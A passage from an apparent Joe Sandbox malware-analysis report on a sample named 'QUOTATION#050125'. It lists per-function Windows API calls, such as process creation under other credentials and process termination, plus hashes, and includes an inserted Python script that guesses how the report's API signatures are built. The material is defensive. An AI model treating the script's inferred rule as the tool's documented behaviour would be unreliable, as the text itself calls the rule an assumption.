                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: 5f6227ca41c7a357fd9a5bced16900bdc6ac5e9e21e80d740f867c981fedea63
                                                                                      • Instruction ID: cb742495d1963dfb0d85c21db20141a912d1e92036ecb8521de50a4011a17f11
                                                                                      • Opcode Fuzzy Hash: 5f6227ca41c7a357fd9a5bced16900bdc6ac5e9e21e80d740f867c981fedea63
                                                                                      • Instruction Fuzzy Hash: EA11447250024DFFDB11CFA8ED49BDA7BA9EB48705F044064FA05A60A0C3718EA0DBA0
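The "API ID" line in each Similarity block above is a token signature built from the function's APIs list, and the same signature is what lets two functions be matched across samples. The following is an added example, not code from Joe Sandbox or from this report: the rule it implements is inferred by me from the listings on this page (CamelCase tokens of each API name, including "Part of subcall" entries; tokens shorter than four characters such as Get, Set, Sys, Sid, W and Ex dropped; tokens grouped by descending count, sorted alphabetically within a group, groups joined with `$`). The four-character cut-off and the treatment of lowercase C-runtime names are assumptions, and the numeric "API String ID" hash is not reproduced. The three sample blocks are copied from the Variant, BeginPaint and CreateProcessWithLogonW functions listed on this page.

```python
"""Reconstruct a Joe Sandbox-style "API ID" token signature from an APIs listing.

Rule inferred from the listings on this page (an assumption, not a documented
Joe Sandbox algorithm): split each API name into CamelCase tokens, drop tokens
shorter than four characters, count occurrences across the function including
"Part of subcall function" entries, group tokens by descending count, sort each
group alphabetically, and join the groups with "$".
"""
import re
from collections import Counter, defaultdict

# "Name.MODULE(" as printed in the report; the "Part of subcall function ..." prefix
# and the trailing "ref: <address>" never contain a "." followed by "(", so they are skipped.
_API_RE = re.compile(r"([A-Za-z][A-Za-z0-9_]*)\.[A-Z0-9_]+\(")
_TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*")
MIN_TOKEN_LEN = 4  # assumption: no token shorter than four characters appears in any API ID on the page


def api_names(listing: str) -> list[str]:
    """Extract API names in call order from the report's bullet lines."""
    return [m.group(1) for line in listing.splitlines() for m in _API_RE.finditer(line)]


def api_tokens(name: str) -> list[str]:
    """CamelCase tokens of one API name, minus the short prefixes and suffixes."""
    return [t for t in _TOKEN_RE.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(listing: str) -> str:
    """Build the "$"-separated token signature for one function's APIs block."""
    counts = Counter(t for n in api_names(listing) for t in api_tokens(n))
    groups: dict[int, list[str]] = defaultdict(list)
    for tok, c in counts.items():
        groups[c].append(tok)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def same_api_id(block_a: str, block_b: str) -> bool:
    """Two functions are API-ID similar when their token signatures match exactly."""
    return api_id(block_a) == api_id(block_b)


# APIs blocks copied from this report (functions around 0011F7B9, 000D9241 and 00121506).
VARIANT_BLOCK = """\
• VariantInit.OLEAUT32(00000035), ref: 0011F7B9
• SysAllocString.OLEAUT32(00000001), ref: 0011F860
• VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F889
• VariantClear.OLEAUT32(0011FA64), ref: 0011F8AD
• VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F8B1
• VariantClear.OLEAUT32(?), ref: 0011F8BB
"""
PAINT_BLOCK = """\
  • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
• BeginPaint.USER32(?,?,?), ref: 000D9241
• GetWindowRect.USER32(?,?), ref: 000D92A5
• ScreenToClient.USER32(?,?), ref: 000D92C2
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000D92D3
• EndPaint.USER32(?,?,?,?,?), ref: 000D9321
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001171EA
  • Part of subcall function 000D9339: BeginPath.GDI32(00000000), ref: 000D9357
"""
LOGON_BLOCK = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001214FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00121506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00121515
• CloseHandle.KERNEL32(00000004), ref: 00121520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0012154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00121563
"""

if __name__ == "__main__":
    for label, block in (("Variant", VARIANT_BLOCK), ("Paint", PAINT_BLOCK), ("Logon", LOGON_BLOCK)):
        print(f"{label}: {api_id(block)}")
```

Because the signature discards call order, argument values and module names, it is a coarse matcher: it will pair the CreateProcessWithLogonW function here with any other function that calls the same set of APIs the same number of times, which is what makes it useful for spotting reused runtime or packer code across samples, but not for distinguishing two functions that differ only in how they use those calls.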
                                                                                      APIs
                                                                                        • Part of subcall function 000D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                        • Part of subcall function 000D9639: BeginPath.GDI32(?), ref: 000D96B9
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00158A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00158A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00158A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00158A80
                                                                                      • EndPath.GDI32(?), ref: 00158A90
                                                                                      • StrokePath.GDI32(?), ref: 00158AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 0a436127f96b2605cd492b6ea63efb7475c20d536123c269ef515d3d8348eb01
                                                                                      • Instruction ID: 00fc4ea27f3dd2740896ec9ff000e6c8f6033f9ecdf4bc16844f7ba07392d7fb
                                                                                      • Opcode Fuzzy Hash: 0a436127f96b2605cd492b6ea63efb7475c20d536123c269ef515d3d8348eb01
                                                                                      • Instruction Fuzzy Hash: 4B11DB7600024DFFDF129F94DC88EAA7F6DEB08395F048012BA199A5A1C7729D95DFA0
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00125218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00125229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00125230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00125238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0012524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00125261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 0e3d60ab88a7e83b1d90d89dae25d6986ba8201ffe02f3d95925257107060d25
                                                                                      • Instruction ID: 50f7f041a162a1b02f2db3579a4a5a281bcd9e85fdfde33cb3c28032558eb89b
                                                                                      • Opcode Fuzzy Hash: 0e3d60ab88a7e83b1d90d89dae25d6986ba8201ffe02f3d95925257107060d25
                                                                                      • Instruction Fuzzy Hash: 7C018F75A00718FFEB109FA59C49A4EBFB8EB48752F044065FA04AB281D6709900CBA0
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C1BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 000C1BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C1C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C1C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000C1C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000C1C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      • Opcode ID: 8899023dfc6eaa812f40f6bc09d7b9cbb1a888a27505193debebbfaaf8cbc333
                                                                                      • Instruction ID: 24a0b788c56c8f607e7fe5927ad736ab38ce076df7499988714f3e419d6a958d
                                                                                      • Opcode Fuzzy Hash: 8899023dfc6eaa812f40f6bc09d7b9cbb1a888a27505193debebbfaaf8cbc333
                                                                                      • Instruction Fuzzy Hash: C1016CB0902759BDE3008F5A8C85B52FFA8FF19354F00411B915C4BA41C7F5A864CBE5
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0012EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0012EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0012EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 939b7ab0e6cbf075eba6949563a99f8706e189720721c2195e6bf9c0ca4d04fb
                                                                                      • Instruction ID: a4de9333d34ae4e3cf74faf7a81af609adaad912c65964c5bf23abb522290253
                                                                                      • Opcode Fuzzy Hash: 939b7ab0e6cbf075eba6949563a99f8706e189720721c2195e6bf9c0ca4d04fb
                                                                                      • Instruction Fuzzy Hash: 0BF01772240758FFE6215B629C0EEEB3A7CEBCAB12F000158F601D9591A7A05A818AF5
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00117452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00117469
                                                                                      • GetWindowDC.USER32(?), ref: 00117475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00117484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00117496
                                                                                      • GetSysColor.USER32(00000005), ref: 001174B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: 5d39f3a99d55e5a3c6ec3837a32640e4e9e2f99a41f5c0d112b079de120a3476
                                                                                      • Instruction ID: 2e66e3ffda473d64fcd95e5628be9af3fe26f58d6b972957a901cd93f3a7c0c2
                                                                                      • Opcode Fuzzy Hash: 5d39f3a99d55e5a3c6ec3837a32640e4e9e2f99a41f5c0d112b079de120a3476
                                                                                      • Instruction Fuzzy Hash: 4C014B31500315FFEB515FA4DC48BEABBB6FB04322F510164F916A7AA1CB311E91EB90
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0012187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0012188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00121894
                                                                                      • CloseHandle.KERNEL32(?), ref: 0012189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001218A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 001218AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: 5d9e38e811384c4ddc0bc9332aaac19e9c45f74fcf74aa6c2fe3ab5aa437985d
                                                                                      • Instruction ID: bc5fb2245f94799f2bddfb0cb5e538be1959224f7a1db5e28e55a6d2d2e6ffe0
                                                                                      • Opcode Fuzzy Hash: 5d9e38e811384c4ddc0bc9332aaac19e9c45f74fcf74aa6c2fe3ab5aa437985d
                                                                                      • Instruction Fuzzy Hash: 90E05276104705FFDA015FA5ED0C94ABB69FB49B22B508625F22689871CB32A4A1DB90
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 0014396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00143A7A
                                                                                      • VariantClear.OLEAUT32(?), ref: 00143C1F
                                                                                        • Part of subcall function 00130CDF: VariantInit.OLEAUT32(00000000), ref: 00130D1F
                                                                                        • Part of subcall function 00130CDF: VariantCopy.OLEAUT32(?,?), ref: 00130D28
                                                                                        • Part of subcall function 00130CDF: VariantClear.OLEAUT32(?), ref: 00130D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4237274167-1221869570
                                                                                      • Opcode ID: f456af0aee705fa2ae2d3a8dc1c60f39ab01473b57605f02f0a913f6329570ea
                                                                                      • Instruction ID: a5eeabbf296c99287b7b7f102e4a67b3c506a2c4bbbdad69c5b7c0342d22ff80
                                                                                      • Opcode Fuzzy Hash: f456af0aee705fa2ae2d3a8dc1c60f39ab01473b57605f02f0a913f6329570ea
                                                                                      • Instruction Fuzzy Hash: C59149756083059FC704EF24C48596AB7E5FF89314F14892EF89A9B362DB30EE45CB92
                                                                                      APIs
                                                                                        • Part of subcall function 0012000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?,?,0012035E), ref: 0012002B
                                                                                        • Part of subcall function 0012000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120046
                                                                                        • Part of subcall function 0012000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120054
                                                                                        • Part of subcall function 0012000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?), ref: 00120064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00144C51
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00144DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00144DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 4175897753-2785691316
                                                                                      • Opcode ID: 124258f990786b5006f0789320414b35a9d1bd627235b333dd6d02f767384380
                                                                                      • Instruction ID: baa187ed3fcc7da20255eaa633f5c4631003cac80c956213d8170fe21f57eca3
                                                                                      • Opcode Fuzzy Hash: 124258f990786b5006f0789320414b35a9d1bd627235b333dd6d02f767384380
                                                                                      • Instruction Fuzzy Hash: 1D910471D0021DAFDF14DFA4D891EEEB7B9BF08314F108169E915BB291EB349A458FA0
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(?,?,00000000,?), ref: 00148CF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 2358735015-567219261
                                                                                      • Opcode ID: 529fce010819f0901a7c7c537ecda959fbbcf596872a6b4daf42c90e3193fd42
                                                                                      • Instruction ID: 37b8f98a9e250c87da76ce246a956fe6c76d74ab0641e8e85e6da8600c6f535a
                                                                                      • Opcode Fuzzy Hash: 529fce010819f0901a7c7c537ecda959fbbcf596872a6b4daf42c90e3193fd42
                                                                                      • Instruction Fuzzy Hash: 82519F31A011169BCB24EFACC9509BEB7A5BF64724B214229E826F72D5EF31DE41C790
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0014AEA3
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0014AF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014AF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell
                                                                                      • String ID: <$@
                                                                                      • API String ID: 1279613386-1426351568
                                                                                      • Opcode ID: 3804cf9ad04576b4bbcbbd3b2671222b181a1e593b2f68f444f4b5a2ccbf90a1
                                                                                      • Instruction ID: 4df0c0bd07eb5199abf6723ce891d0f79aed648646556e079d7c9c484ac3a949
                                                                                      • Opcode Fuzzy Hash: 3804cf9ad04576b4bbcbbd3b2671222b181a1e593b2f68f444f4b5a2ccbf90a1
                                                                                      • Instruction Fuzzy Hash: 55713671A00619DFCB14DFA4C494A9EBBF0BF08314F458499E85AAB3A2CB74ED45CB91
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 0012B5FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 3964851224-769500911
                                                                                      • Opcode ID: b53632d311ad8e95ef8a9045ac252e67e1e1828d94205ee387cd560b13aaa189
                                                                                      • Instruction ID: d3bcebea20d4e0d57a056aa1387da062dee46b0589d058004ca93f7bf07b3795
                                                                                      • Opcode Fuzzy Hash: b53632d311ad8e95ef8a9045ac252e67e1e1828d94205ee387cd560b13aaa189
                                                                                      • Instruction Fuzzy Hash: A241F632A081379BCB206F7DD9D05BE77A5BFA0B54B254229E422EB285F731CD91C790
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00127206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0012723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0012724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001272CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: 4c7d089a5a43afb730991e3d03fca9889e427647f05770959e7ed69fa644129e
                                                                                      • Instruction ID: ea06b45cceb865e3fcc751193150c9aa5a36d6fcaaf98972d9639ec9bf0ad0c6
                                                                                      • Opcode Fuzzy Hash: 4c7d089a5a43afb730991e3d03fca9889e427647f05770959e7ed69fa644129e
                                                                                      • Instruction Fuzzy Hash: 2F418D71A04314EFDB15DF94D884A9B7BA9EF44310F1580ADFD059F28AD7B0DA54CBA0
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00153E35
                                                                                      • IsMenu.USER32(?), ref: 00153E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00153E92
                                                                                      • DrawMenuBar.USER32 ref: 00153EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
